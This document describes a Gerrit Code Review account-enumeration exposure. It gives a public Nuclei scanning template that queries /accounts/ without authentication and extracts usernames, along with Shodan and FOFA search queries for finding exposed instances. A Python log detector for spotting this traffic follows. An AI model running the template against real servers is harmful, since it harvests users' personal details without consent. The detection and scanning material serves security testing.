Gerrit Code Review exposes the /accounts/ REST API endpoint, which can be used to enumerate user accounts. The endpoint allows querying for accounts by username, email, or name, potentially revealing sensitive user information including account IDs, names, emails, and usernames without authentication.
PoC code [public]
```yaml
id: gerrit-account-enum

info:
  name: Gerrit Code Review - Account Enumeration
  author: DhiyaneshDk
  severity: medium
  description: |
    Gerrit Code Review exposes the /accounts/ REST API endpoint which can be used to enumerate user accounts. The endpoint allows querying for accounts by username, email, or name, potentially revealing sensitive user information including account IDs, names, emails, and usernames without authentication.
  reference:
    - https://gerrit-review.googlesource.com/Documentation/rest-api-accounts.html
    - https://gerrit-documentation.storage.googleapis.com/Documentation/2.11/rest-api-accounts.html
  metadata:
    max-request: 2
    verified: true
    shodan-query: title:"Gerrit Code Review"
    fofa-query: title="Gerrit Code Review"
  tags: gerrit,enum,exposure,misconfig

http:
  - method: GET
    path:
      - "{{BaseURL}}/accounts/?q=a&n=10"
      - "{{BaseURL}}/accounts/?suggest&q=a&n=10"

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "_account_id"
          - "username"
        condition: and

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: usernames
        part: body
        group: 1
        regex:
          - '"username":\s*"([^"]+)"'
# digest: 490a0046304402200a73ce4ae2f3fedd7a62c931f0ad59c91e24ab7e10c68d9810fd6e297924634602201dbdd6af385809d62b9d150781c83ed8032c40bdb43d9a4e3bef5d0f114f8da3:922c64590222798bb761d5b6d8e72950
```
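As an added example (not part of the template above or of Gerrit itself), a small Python detector that flags anonymous, successful queries to the /accounts/ listing endpoint in access log lines; the combined-format log lines are constructed for the example, and the IP addresses and user name in them are placeholders.

```python
# Added example (not part of the Nuclei template above): flag unauthenticated
# account-enumeration traffic against Gerrit's /accounts/ endpoint in
# Apache-combined-style access log lines (such as Gerrit's httpd_log).
# The log lines below are constructed for this example, not captured from a real host.
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) \S+" (?P<status>\d{3})'
)

SAMPLE_LOG = """\
203.0.113.5 - - [10/May/2024:12:00:01 +0000] "GET /accounts/?q=a&n=10 HTTP/1.1" 200 812
203.0.113.5 - - [10/May/2024:12:00:02 +0000] "GET /accounts/?suggest&q=a&n=10 HTTP/1.1" 200 790
203.0.113.5 - - [10/May/2024:12:00:03 +0000] "GET /accounts/?q=b&n=10 HTTP/1.1" 200 640
198.51.100.7 - alice [10/May/2024:12:01:00 +0000] "GET /accounts/?q=bob HTTP/1.1" 200 210
198.51.100.9 - - [10/May/2024:12:02:00 +0000] "GET /accounts/self HTTP/1.1" 403 0
192.0.2.4 - - [10/May/2024:12:03:00 +0000] "GET /changes/?q=status:open HTTP/1.1" 200 5000
"""

def parse_line(line):
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def is_account_query(path):
    """True for /accounts/ listing queries (q= or suggest), not /accounts/<id>."""
    parts = urlsplit(path)
    if parts.path != "/accounts/":
        return False
    params = parse_qs(parts.query, keep_blank_values=True)
    return "q" in params or "suggest" in params

def enumeration_findings(log_text):
    """Return {ip: count} of anonymous (user '-'), successful /accounts/ queries."""
    counts = defaultdict(int)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if not rec or rec["method"] != "GET" or rec["status"] != "200":
            continue
        if rec["user"] == "-" and is_account_query(rec["path"]):
            counts[rec["ip"]] += 1
    return dict(counts)

if __name__ == "__main__":
    for ip, n in enumeration_findings(SAMPLE_LOG).items():
        print(f"{ip}: {n} anonymous /accounts/ query responses")
```

Authenticated lookups (a named user in the log) and requests for a single account are deliberately left out, so the output points at anonymous listing traffic only.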